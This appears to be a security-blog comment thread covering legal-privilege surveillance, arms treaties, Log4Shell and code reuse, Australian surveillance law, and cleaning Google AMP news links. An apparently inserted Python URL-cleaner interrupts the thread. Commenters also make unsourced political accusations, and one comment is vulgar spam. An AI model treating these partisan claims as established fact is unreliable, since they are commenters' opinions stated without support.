https://www.wilmerhale.com/en/insights/blogs/WilmerHale-W-I-R-E-UK/prison-rules-unwarranted-and-self-authorised-surveillance-of-prisoners-legal-consultations

This also goes on outside of prisons, including monitoring of individuals’ communications with legal counsel who are not prisoners, and who have not been convicted of a crime, using a variety of different methods.

ResearcherZero December 12, 2021 4:35 AM

@Supreme Leader

A Radicalized Christian and a Communist managed to negotiate a nuclear arms treaty, so anything is possible.

“The treaty resolved a crisis of the 1980s when the Soviet Union deployed a missile in Europe called the SS-20, capable of carrying three nuclear warheads. The United States responded with cruise and Pershing II missiles based in Europe.”

“By the time President Ronald Reagan and Mikhail S. Gorbachev, the Soviet leader at the time, negotiated the deal to ban the weapons in 1987, the intermediate-range missiles had come to be seen as a hair trigger for nuclear war because of their short flight times — as little as 10 minutes.”
https://www.nytimes.com/2019/02/01/world/europe/inf-treaty.html

Signed by the US and the USSR in 1987, the arms control deal banned all nuclear and non-nuclear missiles with short and medium ranges, except sea-launched weapons.

Many experts believe that negotiations should have continued to try to bring the Russians back into compliance. It is, they fear, part of the wider unravelling of the whole system of arms control treaties that helped to curb strategic competition during the Cold War.
https://www.bbc.com/news/world-us-canada-45930206

In a move that reflected what he said was “a vastly different world,” President Bush formally announced today that the United States was withdrawing from the Antiballistic Missile Treaty that it signed with the Soviet Union in 1972.
https://www.nytimes.com/2001/12/13/international/bush-pulls-out-of-abm-treaty-putin-calls-move-a-mistake.html

Instead of trying to hack each other’s satellites every day, that effort could instead be put into negotiating a new treaty.

Security relies on cooperation; without cooperation there really isn’t any security at all, just a bunch of rhetoric about strategic defense, which in reality means more weapons of mass destruction. And that is why all the bridges and roads are f**cked, because the money was spent on weapons that you cannot use without destroying yourself, which seems just a little bit MAD.

Clive Robinson December 12, 2021 6:10 AM

@ Gerard van Vooren,

Well, these are my ideas. You are free to attack.

Attack no, a little caution yes.

Look up Z3950 that underlies some of the older search and information systems (WAIS being the originator).

In the beginning it was a nice protocol…

A company I worked for used Z3950 and had a client for it. It also had a seat on the standards committee which might sound glamorous to some but in reality was a “Right Royal Pain in the BTM”.

I managed to extricate my involvement with Z3950 even though “Bath” in the UK is a nice place to visit and I was friendly with people at the University, when “librarian types” started pushing to have “SQL” added as “minor functionality” along with a few other DB protocols. Trying to resolve just the “attribute to indexing problem”[1] resulted in a committee of its own that later became the “Bath protocol”. Which as there is an expression in the UK to represent failure of “Taking a bath” so you can imagine how the protocol got spoken of.

That was in effect an “easy” problem to articulate and comprehend, but there are deeper dangers than circling sharks to worry about.

Having at the time been looking at not just “Wide Area Information Services”(WAIS) databases but “Wide Area Distributed Environment Services”(WADES) database design I knew just how crazy things would get at a very fundamental level[2].

Librarians who really are some of the politest people you would care to meet and are very tolerant of what many consider “strange notions” especially those who work in universities, do have their limits though… Imagine if you can the strange looks you get even from them when you start talking about “CRUD and Time Cones”…

I’m not sure of the current state of Z3950 as I’ve avoided it since the turn of this century. But a look into the history of it and WAIS might give “fore warning” of “maelstroms ahead”.

[1] The “attribute to indexing problem” is very very simple to describe and should likewise be to resolve, but… in practice is hellishly difficult to impossible to resolve in any real world practical reality, and makes the struggles of “internationalization” look like child’s play. You want to carry out a simple search so your “search” first gets turned into a set of “attributes”, these then at the individual databases have to be turned into a local “search” to generate “indexing” for the query before the query can even run. OK simple monotonic information like an ISBN number can be handled fairly painlessly, but what about an “author” there are many ways just names exist and can be stored and that’s before you have to find ways to differentiate half a hundred “J Smiths”.

[2] People often do not understand the difference between what WAIS wanted to do and what they could achieve and what a true WADES. In short WAIS was a client on top “of many isolated” databases, whereas WADES is a client on top “of an integrated distributed” database (ie effectively “one” massive database consisting of many parts). With many isolated databases consistency is a “local” issue thus resolvable, in a “global” database to do consistency you have to solve a few fundamental things that include “relativity” as they have to do in GPS and Mobile phone networks and in the case of “consistency” the fun of “time cones”.

Ted December 12, 2021 6:53 AM

@Winter, ALL

What’s your take on this?

“Netherlands Says Armed Forces May Combat Ransomware Attacks”

the way in which the Dutch are handling the nonstate actor problem is significant.

[…] Effectively, this seemingly indicates that military use is a legal option because a failure to take action on ransomware actors operating from your borders is no different than actually sponsoring the action,” notes Williams, a former member of the U.S. National Security Agency’s elite hacking team.

https://www.govinfosecurity.com/netherlands-says-armed-forces-may-combat-ransomware-attacks-a-17703

Freezing_in_Brazil December 12, 2021 9:09 AM

@ Clive, JonKnowsNothing

I’m fairly certain I don’t need FireFox and have not for years…

Firefox is for kids. Real men [and women] browse the web in Emacs! [:wink]. 🙂

Winter December 12, 2021 10:52 AM

@Ted
“Netherlands Says Armed Forces May Combat Ransomware Attacks”

Not sure what to make of this. Have not heard about it yet.

In general, if no one is shot, there are few barriers, if any, to the army helping the civil sector.

Currently in the news, the army helps secure our maximum security prison against a suspected mercenary breakout attempt. They caught and put on trial a drugs kingpin who made a lot of money and is also a homicidal maniac. It is quite likely he is capable and willing to fly in a mercenary attack force to try to free him.

So, military assistance against ransomware attacks would not be problematic at all, I think.

Winter December 12, 2021 10:55 AM

@Supremes
“Christian nationalism”

Note that “Christian nationalism” is a euphemism/stage name for White Supremacists.

lurker December 12, 2021 11:54 AM

@Ted, @NicholasWeaver, @All

Java has a design flaw in it: It has a lot of complexity and the ability to load random pieces of code and execute them. […] And, of course, there are a lot of toolkits already available to take advantage of this class of vulnerability simply because it is such a common problem in Java systems.

I remember saying when Java landed on our plates that this would end badly. I admire @Clive continually reminding us how we repeat history. I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

Commercial software like Java suffers from multiple layers of historical amnesia. At the lower levels new coders join the project unaware of historical mistakes; at the top the imperative to get product to market deliberately ignores historical mistakes. It’s the human condition, we cannot avoid death, taxes, and bad software.

whoopsi silverburg December 12, 2021 12:35 PM

I used to masturbate to pac-man, hoping he would chomp me it felt very real and very sexual

Clive Robinson December 12, 2021 12:45 PM

@ ResearcherZero,

Re : Listening to privileged conversations…

As you know a Spanish Organisation –alleged to have “official connections”– bugged the ladies toilet at a certain Embassy in London UK.

The reason was privileged communications between a “guest in the Embassy” and his legal team.

When the “guest” was dragged away he was put in a situation where it was not possible for him to have “privileged communications”; this was not just aided but actively encouraged by the person running the court he was imprisoned in without benefit of having counsel present.

A witness to what occurred inside the Embassy with regards the bugging etc who was going to testify in Court was given Eight Months in “hard” Prison on trumped up political charges in Scotland, which “conveniently” stopped him being able to testify in Spain.

The man is in his sixties and whilst he has a young child he is also not in anyway robust in health.

As for the “guest” I think you know who I’m talking about, they have tried just about everything to not just destroy his mind but by repeated medical negligence his health as well.

But don’t bother looking in the MSM, the UK Guardian newspaper, has sold its soul to the UK security forces via the Editor some time ago with some of the journalists obviously being “fed stories”…

Other UK MSM mentions nothing about what has been described by several experts and a UN Rapporteur as “torture” being carried out…

Recent legislative changes have all but made even peaceful protest a criminal offence, with draconian punishments.

All at the behest of “the whilly waver in chief” who is trying to sell the UK to the US as a new state, presumably so he can have a shot at being US Pres (yup he was born in NY and is over 35, as for the sound in mind and moral turpitude[1]… Your guess[2]

[1] Black’s Law Dictionary has defined Moral turpitude as,

“An act of baseness, vileness, or depravity in the private duties which a man owes his fellow men, or to society in general, contrary to the accepted and customary rule of right and duty between man and woman, or conduct contrary to justice, honesty, modesty, or good morals.”

Definitely sounds like BoJo is hooked on more than one barb there.

[2] In the early 1990s a Supreme Court ruled that,

“moral turpitude is not involved in every criminal act.”

But it went on to say,

“moral turpitude is somewhat a vague and indefinite term, the meaning of which must be left to the process of judicial inclusion or exclusion as the cases are reached.”

So does BoJo get a “pass” because of “The Caesar’s Wife Principle”?

Clive Robinson December 12, 2021 1:03 PM

@ SupremeL, name.withheld…, ResearcherZero, Winter,

Regards the observed “growing threat”, yes it is a National Security threat up on the highest scale.

There are three or four people who have been warning about it here about as politely as you can get for several years now… Trouble is things have a habit of disappearing…

I suspect it’s going to start building up come the New Year as the US start running into election season. Not sure if it will come fully to a head, or wait until 2024 when certain folks will almost certainly not be holding hands and singing Kumbaya at candle lit vigils any longer.

Ted December 12, 2021 1:10 PM

@lurker, ALL

Re: Log4Shell and Nicholas Weaver’s article

I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

You are too funny! 😆

But apparently you, Clive, and Bruce were all onto something. It looks like Bruce wrote about the critical need for safe and secure software following the SolarWinds hack. And here, as Clive would say, is history repeating itself.

I am grateful that @Nicholas Weaver made his article so readable, so that people with varying degrees of technical sophistication could still generally understand the issues going on.

I think it was positive that he mentioned the Software Bill of Materials (SBOM) before giving his final thoughts:

There is often talk about the need for a software bill of materials (SBOM) in systems. A SBOM is a machine-readable list of all external components including libraries, the libraries used by those libraries, and so-on. A recent executive order, in fact, mandated SBOMs for government purchased systems.

During all this craziness, at least people can have hope that there is a possible path forward to ameliorate these hard reality slaps.

It seems like that has a great potential to help move the whole community in the right direction.

Clive Robinson December 12, 2021 2:01 PM

@ ALL,

Crap in news feeds…

As an experiment a “google news feed” link was obtained and sent to me,

https://amp-theguardian-com.cdn.ampproject.org/v/s/amp.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station?amp_js_v=a6&amp_gsa=1&usqp=XXXXXXXXXXXXXXXXXXX%3D#aoh=XXXXXXXXXXXXXXXX&csi=1&referrer=https%3A%2F%2Fwww.google.com&amp_tf=From%20%251%24s&ampshare=https%3A%2F%2Fwww.theguardian.com%2Fmoney%2F2021%2Fdec%2F11%2Fsouth-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

As you can see a lot of “cruft” some of which I’ve replaced with “X”.

Now previously with Google links just chopping off everything after the “?” was sufficient. However someone wrote a script to do that. So Google retaliated and now you get left with,

https://amp-theguardian-com.cdn.ampproject.org/v/s/amp.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

Which gives you an error at Google with demands you prove you are “human” etc…

So what you need to do is strip out the “amp” crap I’ve highlighted and replace it with “www” to finally get,

https://www.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

Which as they say “Is one heck of a difference”

Now… If someone wanted to find a real use for “Machine Intelligence” as a worthwhile project, “de-googling” etc might fit the bill

I wonder if they would let you do it as part of one of their “Summer of Code” events or similar 😉
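Clive’s two-step clean-up above, as an added example that is not his code: first drop everything from the “?” onwards, then unwrap the AMP-cache host and path to get the publisher’s own address. The AMP cache path layout (a one-letter prefix such as /c/ or /v/, an optional s/ for https origins, then the origin host) and the amp. to www. rename are assumptions that hold for the Guardian link on this page but may not for every publisher.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample in the same shape as the link in the comment above; the
# opaque parameter values are replaced with X, as in the original.
SAMPLE_AMP_LINK = (
    "https://amp-theguardian-com.cdn.ampproject.org/v/s/amp.theguardian.com/"
    "money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station"
    "?amp_js_v=a6&amp_gsa=1&usqp=XXXXXXXXXXXXXXXXXXX%3D#aoh=XXXXXXXXXXXXXXXX&csi=1"
    "&referrer=https%3A%2F%2Fwww.google.com"
)

# Hosts under this suffix are Google's AMP cache, not the publisher.
AMP_CACHE_SUFFIX = ".cdn.ampproject.org"

# Assumed AMP cache path layout: /<letter>[/s]/<origin host>/<origin path>
# The "s" segment marks an https origin. This is an assumption, not a spec quote.
_AMP_CACHE_PATH = re.compile(r"^/([a-z])(/s)?/([^/]+)(/.*)?$")


def strip_tracking(url: str) -> str:
    """Step 1: chop off everything after the '?' (query string and fragment).

    This is where the usqp/aoh/csi/referrer parameters live.
    """
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))


def de_amp(url: str) -> str:
    """Step 2: rewrite an AMP-cache URL to the publisher's canonical URL.

    Non-AMP URLs are returned unchanged. The query and fragment, if still
    present, are carried over so the two steps can be used independently.
    """
    parts = urlsplit(url)
    if not parts.netloc.endswith(AMP_CACHE_SUFFIX):
        return url
    match = _AMP_CACHE_PATH.match(parts.path)
    if match is None:
        raise ValueError("unrecognised AMP cache path: " + parts.path)
    _kind, secure, origin_host, origin_path = match.groups()
    scheme = "https" if secure else "http"
    # Publisher-specific assumption: the AMP subdomain maps to the www one,
    # which is what the Guardian link in the comment needs.
    if origin_host.startswith("amp."):
        origin_host = "www." + origin_host[len("amp."):]
    return urlunsplit(
        (scheme, origin_host, origin_path or "/", parts.query, parts.fragment)
    )


def clean_news_link(url: str) -> str:
    """Both steps together: tracking cruft gone, AMP cache unwrapped."""
    return de_amp(strip_tracking(url))


if __name__ == "__main__":
    print(clean_news_link(SAMPLE_AMP_LINK))
```

Dropping the query string is lossy by design: a site that keys a paywall bypass or a referrer check on those parameters (as Ted observed with the Guardian) will behave differently with the cleaned link.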

Clive Robinson December 12, 2021 3:55 PM

@ ALL,

With regards Nicholas Weaver’s article a niggle…

As a person who was writing low level code in CPUs[1] in the early 1980’s as well as for 8 bit and 16 bit CPUs and microcontrollers I have a lot of quite painful programming experience that is such I get twinges whenever the wind blows or the sun shines…

Which is why Nicholas Weaver’s,

“The first rule of being a good programmer is don’t reinvent things. Instead we re-use code libraries, packages of previously written code that we can just use in our own programs to accomplish particular tasks.”

As they say “Has given me a dose of the hives”…

I do not disagree with the “don’t reinvent” it’s sound advice with one proviso… Any alternative is “sound” and mostly they are not…

So “re-use” is frequently “bad advice” as in this occasion.

For those with longer memories that have been hanging around on this blog, they may remember the protracted series of conversations on “Castles-v-Prisons” I had with @Nick P and later @Wael who renamed it “CvP”.

I went into some length as to why “code re-use” was a bad idea especially inside of organisations where the management emphasis is generally on “code out the door” rather than thoughtful “code quality”.

Anyone involved with Standards will tell you just how much thought and care went into the C libraries simply because those involved back then actually understood the dangers of “Code re-use”. Something that for various reasons the current industry apparently does not care about.

Any way as I pointed out with “CvP” the tendency today is not to write code but plumb libraries together. In a not too dissimilar way to that older *nix bods used to “Hack a rapid prototype” using Shell Scripting and lots of little *nix utilities.

My point was that from a security aspect there were actual advantages if the utilities/tasklets were written by experts.

Not just hacked together in a hurry for one job, then augmented over and over for every job there after. Like trying to get a blind bicycle maker to work towards something suitable for a fish and squid to ride in tandem…

I’m sure others will have their own view on this…

But as Nicholas Weaver has said, spare a thought for all those who through no fault of their own are having to wrestle this bug out of code they probably know next to nothing about…

Oh and don’t “Hate on Nebraska” after all somebody has to live there or it wouldn’t exist (though rumour has it, it was invented as a decoy in a cornfield in some war, and nobody got around to knocking it down in 1861 ;-),

[1] That is for code to go inside a CPU at one level it’s called “microcode” but at the next layer down it’s called “Register Transfer Language”(RTL) not to be confused with several other RTL’s

Such is the shortage of “Three Letter Acronyms”(TLAs) that reuse is guaranteed… And reuse is always a problem hence this comment…

SpaceLifeForm December 12, 2021 4:48 PM

@ Clive

re; Crap in news feeds…

Interesting.

Sent to you via iPhone?

Sent to you from across the pond?

Ted December 12, 2021 5:23 PM

@Clive, SpaceLifeForm, ALL

Re: Article URLs (and their ‘crap’)

This is really weird.

The first super gnarly link lets me access the whole article. The last, more elegant link, puts the article behind a request for registration.

Also South Western Railway was really putting some major numb-skullery on display.

South Western’s staff did not check whether any passengers were vulnerable before abandoning them.

And the alley-oop from the rail regulator, the Office of Rail and Road:

”The Consumer Rights Act gives rail passengers the ability to seek statutory redress if a train operator fails to provide a passenger service with reasonable care and skill.”

What a collective gasp there must have been from parents and loved ones.

Clive Robinson December 12, 2021 5:37 PM

@ lurker,

I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

I used to have a sign like that…

Only it had “Beware” at the front of it a double “o” and I held a 12 Gauge to my shoulder, and whilst pigeon pie was not assured, my frustration levels dropped faster than the beta blockers would have worked on “angry man” :-S

Whilst I can’t say it would work for every one there is something kind of relaxing even just blowing holes in paper targets at the range, just to keep my eye in 😉

lurker December 12, 2021 5:43 PM

@Clive, @SLF, re crap urls

I’ve noticed that recently I just copy/paste a news link from a G search page to a document on my own machine. Scripting a cure for it is submitting to G breaking the web. The cure is to not use G. It’s a pity they seem to be more up to date and more comprehensive on news search…

Clive Robinson December 12, 2021 5:47 PM

@ Ted,

The last, more elegant link, puts the article behind a request for registration.

Turn off javascript and cookies and try again 😉

As a rule of thumb…

If you see a web page load then one of those annoying “you have to say yes to being data raped” screens pops up, it’s probably launched by javascript in your browser so disabling javascript makes your life so much faster and less irritating.

You would have thought any half way sensible browser designer who had not been bought off by Google, the ad industry or similar would have added a “click to dismiss” button by now… Or make a javascript off button in the frame.

Clive Robinson December 12, 2021 5:56 PM

@ SpaceLifeForm,

Sent to you via iPhone?

Err no, a phone emulator running inside a container on an isolated windows box in a lab somewhere “Narph Lundon Way”.

Ted December 12, 2021 6:05 PM

@Clive

Turn off javascript and cookies and try again 😉

Oh man. I feel like I’m being called to the principal’s office.

Thanks, though, that worked 😭

SpaceLifeForm December 12, 2021 6:59 PM

@ lurker, Ted, Clive, ALL

Re: crap URLs

It is weirder than you may think.

I am just paying attention, connecting dots, and thinking outside of the box.

You all have seen a link change colour after clicking on the link, right?

Have you ever seen part of the link change colour on a link you never clicked on? Not starting with the http[s]// ?

2nd link, ampersand to ampersand. I slightly lie about the characters under study here.

Clive, we need more info. What platform sent you the link? Are we sure your redaction really was sufficient?

Obviously, the sender did not open in new tab, and then send you that link.

As I said, Interesting. Especially the two parameters you did not redact.

Are they 7-bit ASCII, or some UTF-8 that my mind’s eye can not discern?

ResearcherZero December 12, 2021 8:17 PM

@Clive Robinson

““Machine Intelligence” as a worthwhile project, “de-googling” etc might fit the bill”

This certainly would be a great project.

I’ve been wondering if google is running experiments with making payment to news organisations, the most annoying experience possible?
If the news organisations don’t then get paid, it’s the fault of ad-blockers and extensions, not the fault of google?

@Ted

Australian prisons are indeed Victorian. The super-max prisons are probably more dystopian, with a Victorian feel.

Gerard van Vooren December 12, 2021 8:56 PM

Do you know about hxxps://gemini.circumlunar.space

I wasn’t aware of Gemini but now I think that I like it enough to look into it a bit more. Thanks a lot!

(it still lacks the forms and pictures, but hey… I like simplicity)

ResearcherZero December 12, 2021 9:26 PM

@Ted

The ability of the press to report freely on its government is a cornerstone of American democracy. That ability is, by any reasonable assessment, under siege.

The Times’s executive editor, Jill Abramson, put it simply when I asked her about it Tuesday: “The press is supposed to hold government accountable. These investigations intrude on that process.”

This isn’t just about press rights. It’s about the right of citizens to know what their government is doing. In an atmosphere of secrecy and punishment – despite the hollow promises of transparency — that’s getting harder every day.
https://publiceditor.blogs.nytimes.com/2013/05/14/leak-investigations-are-an-assault-on-the-press-and-on-democracy-too/

“Material cannot be classified to conceal legal violations or prevent embarrassment.”

This bit doesn’t seem to be taken very seriously anymore.

Legal experts say both physical and digital surveillance is worrying, especially when done by a government-owned agency.

“State surveillance comes at a very high democratic cost,” Ms Al-Azzawi says.

“Surveillance violates people’s rights to privacy, and it has a really chilling effect on the exercise of political rights.”

“I think that this kind of surveillance, the fact that it is happening in an unregulated environment, means that we’re all at risk.”
https://www.abc.net.au/news/2021-11-25/victoria-forests-agency-accused-of-spying-on-campaigner/100613342

ResearcherZero December 12, 2021 9:42 PM

@Ted

These spying laws in Australia are also being expanded.

Section 280(1)(b) of the Telecommunications Act enables a range of agencies from councils to the RSPCA and environmental authorities to access telecommunications metadata.

The government said it wants “communication” to encompass “phone calls, emails, instant messages, video conversations and conversations via over-the-top messaging applications”, including “draft emails” and “unsent” IM messages.
https://www.homeaffairs.gov.au/reports-and-pubs/files/electronic-surveillance-framework-discussion-paper.pdf

AN0M “second phase” has begun
https://www.afp.gov.au/news-media/media-releases/operation-ironside-phase-2-land-second-blow-organised-crime

@All

There is some more about Log4j here

The bug lies in Apache Foundation’s open source Struts Log4J logging utility, in version 2.14 and earlier.

A simple to use exploit that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems.
https://www.lunasec.io/docs/blog/log4j-zero-day/

Log4js is a popular logging library for Java which, due to insecure handling of directory lookups, allows the remote execution of arbitrary code in its default configuration.
https://github.com/sponsors/rgoers

Ted December 12, 2021 9:52 PM

@ResearcherZero

The Times’s executive editor, Jill Abramson, put it simply when I asked her about it Tuesday: “The press is supposed to hold government accountable. These investigations intrude on that process.”

Hold up. Can you expand on that?

ResearcherZero December 12, 2021 9:56 PM

@Ted

Reporters’ phone logs and e-mails were secretly subpoenaed and seized by the Justice Department in two of the investigations, and a Fox News reporter was accused in an affidavit for one of those subpoenas of being “an aider, abettor and/or conspirator” of an indicted leak defendant, exposing him to possible prosecution for doing his job as a journalist. In another leak case, a New York Times reporter has been ordered to testify against a defendant or go to jail.

“I worry now about calling somebody because the contact can be found out through a check of phone records or e-mails,” said veteran national security journalist R. Jeffrey Smith of the Center for Public Integrity, an influential nonprofit government accountability news organization in Washington. “It leaves a digital trail that makes it easier for the government to monitor those contacts,” he said.

The administration’s war on leaks and other efforts to control information are the most aggressive I’ve seen since the Nixon administration, when I was one of the editors involved in The Washington Post’s investigation of Watergate. The 30 experienced Washington journalists at a variety of news organizations whom I interviewed for this report could not remember any precedent.
https://cpj.org/reports/2013/10/obama-and-the-press-us-leaks-surveillance-post-911/

Drake is the guy who best fits the whistle-blower profile: He gave information to a Baltimore Sun reporter who wrote “a prize-winning series of articles for the Sun about financial waste, bureaucratic dysfunction, and dubious legal practices” in the National Security Agency. After years of hounding, the case against Drake fell apart, and he wound up pleading guilty to one misdemeanor. No jail time.

“We have tried more leak cases—brought more leak cases during the course of this administration than any other administration,” Holder said before the Senate Judiciary Committee last year.
https://slate.com/news-and-politics/2013/05/obamas-justice-department-holders-leak-investigations-are-outrageous-and-unprecedented.html

ResearcherZero December 12, 2021 10:20 PM

@Ted

“IMAGINE if American citizens never learned about the abuse of prisoners at Abu Ghraib. Imagine not knowing about the brutal treatment of terror suspects at United States government “black sites.” Or about the drone program that is expanding under President Obama, or the Bush administration’s warrantless wiretapping of Americans.”

“This is a world without leaks.”

“And a world without leaks — the secret government information slipped to the press — may be the direction we’re headed in. Since 9/11, leakers and whistle-blowers have become an increasingly endangered species. Some, like the former C.I.A. official John Kiriakou, have gone to jail.”
https://www.nytimes.com/2013/03/10/public-editor/the-danger-of-suppressing-the-leaks.html

The A.P. said that the Justice Department informed it on Friday that law enforcement officials had obtained the records for more than 20 telephone lines of its offices and journalists, including their home phones and cellphones. It said the records were seized without notice sometime this year.
https://www.nytimes.com/2013/05/14/us/phone-records-of-journalists-of-the-associated-press-seized-by-us.html

This kind of stuff happens in Australia, only I don’t remember there being any requirement to inform anyone that they are pursuant to an order to collect their communications. They may find out when they get a knock on their door and are presented with a seizure order, and paperwork/devices are seized afterwards.

Although the government is expanding the law to encompass “phone calls, emails, instant messages, video conversations and conversations via over-the-top messaging applications”, including “draft emails” and “unsent” IM messages under Section 280(1)(b) of the Telecommunications Act…

…communications are already being collected, such as private messages on social media and other communications. Of course you would have to prove your communications have been collected, and the orders are secret.

There is no Bill of Rights in Australia, no Fourth Amendment. Your rights come down to what can be proved on paper, and that evidence may or may not be allowed to be heard at a trial. If you have a large amount of money, the evidence that may increase, depending on who is in charge of the hearing.
I’d recommend having at least a few million spare.

ResearcherZero December 12, 2021 10:26 PM

@Ted

And herein lies the rub. If the case may set a legal precedent, if you lose, everyone may lose.

Ted December 12, 2021 10:38 PM

@ResearcherZero

Hi my friend. What’s the one most pressing topic you are worried about? Pretend I can only process 280 characters at a time. Otherwise I don’t know where to start.

Maybe others will be pulling out things that concern them?

ResearcherZero December 12, 2021 10:51 PM

@Ted

This would be the most pressing topic that concerns me.

“Witness K is an ex-Australian intelligence officer who blew the whistle on the bugging of East Timor that he says occurred in 2004 during talks to carve up lucrative oil and gas reserves.”
https://www.standard.net.au/story/7228569/secret-document-is-key-witness-k-lawyer/

“ASIO officers raided the Canberra office of lawyer for East Timor Bernard Collaery and cancelled the passport for a retired spy expected to give evidence.”
https://www.abc.net.au/news/2013-12-04/asio-arrests-key-witness-in-east-timor-spying-scandal/5132954

ResearcherZero December 12, 2021 10:58 PM

@Ted

The ex-Australian intelligence officer embarrassed the government when he exposed Australia was secretly spying on the East Timor negotiation team during negotiations over East Timor’s oil and gas reserves. Australia also holds money from the gas and oil profits in a Sovereign Wealth Fund, on East Timor’s behalf.

“For 14 years now, Australia’s tiny neighbour, East Timor, has been consistently requesting Australia to negotiate the establishment of permanent maritime boundaries between the two coastlines. For 14 years now, Australia has refused to even consider doing so.”
https://www.standard.net.au/story/7228569/secret-document-is-key-witness-k-lawyer/

“Instead it has jostled East Timor into a series of temporary resource sharing arrangements, all of which short-change one of the poorest countries in Asia out of billions of dollars in oil and gas resources.”
https://www.smh.com.au/opinion/australia-is-guilty-of-the-same-misconduct-as-china-over-our-treatment-of-east-timor-20160713-gq54u0.html

Ted December 13, 2021 12:00 AM

@ResearcherZero, JonKnowsNothing, ALL

Re: Australia–East Timor spying scandal

It looks like @JonKnowsNothing knows something about this, as he mentioned it in a squid post back in 2020. Maybe we could phone a friend about this?

https://www.schneier.com/blog/archives/2020/10/friday-squid-blogging-chinese-squid-fishing-near-the-galapagos.html/#comment-356957

“Australia–East Timor spying scandal”
https://en.wikipedia.org/wiki/Australia-East_Timor_spying_scandal

lurker December 13, 2021 12:31 AM

@ResearcherZero: including “draft emails”

For quite some years my “draft emails” have been composed on a basic text editor before connecting to the mail server. I suspect POP or IMAP doesn’t matter. The next task is to follow @Clive into the freedom of no email…

ResearcherZero December 13, 2021 12:54 AM

@Ted

How can anyone report on security lapses if someone from the government decides to come after the individual reporting the security lapse?

“State officials’ best response would have been to take down the site, thank the reporter and immediately begin its own investigation into the data exposure, not to kill the messenger with threats of legal action,”
https://statescoop.com/missouri-parson-reporter-did-nothing-wrong/

There is also generally a requirement to report a crime if you witness it.

“The Afghan police are described beating and harassing civilians; according to one report, when his bodyguard refuses to shoot a civilian, a police chief shoots the bodyguard instead. An orphanage that opened with great fanfare is shown to be empty, the coalition’s money embezzled; the police and Army are described feuding with each other, and insurgents are shown attacking U.S. troops using vehicles supplied by the coalition to fight them.”

“The documents describe the Taliban’s efforts to turn U.S. allies into enemies with bribes and threats and the killing of civilians through mistakes and misunderstanding (a deaf person who flees a convoy out of nervousness can’t hear warnings and gets shot; five children get killed in a rocket attack that was part of a botched raid against an enemy who isn’t present). Also revealed is the wider-than-known use of drones inside Afghanistan and the Taliban’s use of heat-seeking missiles against U.S. aircraft, the very type of weapon that the United Sates supplied to the mujahedeen to defeat the Soviets in the 1980s.”
https://www.cbsnews.com/news/wikileaks-documents-white-house-tries-to-kill-the-messenger/

The WikiLeaks disclosures revealed resource-driven gaps and weaknesses in CIA’s insider threat program.

“exempting the intelligence community from baseline federal cybersecurity requirements was a mistake.”

From intelligence brief:

“We have been slow – due to resource choices and cultural resistance – to extend state-of-the-art auditing and user activity monitoring technology to mission systems not connected to the main enterprise network.”
https://www.wyden.senate.gov/imo/media/doc/wyden-cybersecurity-lapses-letter-to-dni.pdf

The talk explains and illustrates the procedural and technical details of the surveillance in and around the Ecuadorian embassy in London during the time Julian Assange stayed in there from June 2012 until April 2019.
https://media.ccc.de/v/36c3-11247-technical_aspects_of_the_surveillance_in_and_around_the_ecuadorian_embassy_in_london

In Australia 13 recommendations for changes to the Telecommunications Act remain classified…

“In effect, this bill would allow spy agencies to modify, add, copy or delete your data with a data disruption warrant; collect intelligence on your online activities with a network activity warrant; [and] take over your social media and other online accounts and profile with an account takeover warrant.”
https://www.itnews.com.au/news/police-get-online-account-takeover-data-disruption-powers-569062

“It is outrageous that these warrants won’t come from a judge of a superior court that is appointed on their personal capacity.”
https://parlinfo.aph.gov.au/parlInfo/download/legislation/amend/r6623_amend_49c26454-34c3-45fc-8f54-e837bac45395/upload_pdf/QL187.pdf;fileType=application%2Fpdf

All but four of the 190 unclassified recommendations have been agreed to by the government in full, part or principle, while a further 13 recommendations are classified.
https://www.ag.gov.au/national-security/publications/report-comprehensive-review-legal-framework-national-intelligence-community

Ham radio with a pre-arranged cypher for transmitting messages is starting to sound a lot better than email. Place the antenna so that if someone comes and cuts the support wires, then it falls on a neighbor’s house. Make sure to catch the offenders on camera.

Ted December 13, 2021 1:09 AM

@ResearcherZero

I am on this forum to enjoy security discussions. There are others who can discuss security matters with you. Thank you.

SpaceLifeForm December 13, 2021 1:45 AM

@ ResearcherZero, Ted

If the case may set a legal precedent, if you lose, everyone may lose.

My observation has been for some time, that there are actors filing vexatious lawsuits, with the sole intent to intentionally lose the case, but to create legal precedent.

The judges and juries are not buying the shtick.

Clive Robinson December 13, 2021 3:13 AM

@ Ted,

@ResearcherZero, has “overloaded” a little, but I can understand why.

Effectively for the entirety of this century we have been spied upon by our governments, without any kind of restraint.

Contrary to what people think this did not start with “terrorism” it started as the agencies got the capabilities from Boeing, IBM, Cisco, and a few others back last century.

As far as I can tell in the US it picked up under the Clinton tenure though I very much doubt the orders if there even were any came down from the executive.

It all has hallmarks of a “push up and make de facto” rather than an “orders down de jure”.

In short those in the agencies did a land grab on society and have bullied and bribed various people in government to belatedly give those illegal or immoral acts the credence of legality, when in fact they had none.

As @lurker points out I don’t have personal email and gave it up quite some time ago. Back then I looked paranoid to many, with retrospect these days maybe “not so much”.

I also looked paranoid when I started saying why I would not recommend the use of Tor and gave a whole slew of technical reasons. Now people are starting to see and understand why.

I still look paranoid to others because I don’t use “secure messaging Apps” even though I can show without question they are,

1, Insecure in use.
2, A liability to the users.

Why am I capable of seeing these things sometimes more than a decade ahead of time?

Perhaps it’s not that I am some kind of genius, but because I,

“Dare to think evil”.

That is every time I see a new piece of technology due to past experience I think,

“How can this be used to hurt me”.

Then I sit down and work it out and model it or build and test it. I also work out, model, build, and test solutions.

Our host @Bruce used to talk about “thinking hinky” well I do more than “think hinky” I “do hinky” thus I “know capabilities”.

And I do tell people about these “capabilities” but as they say,

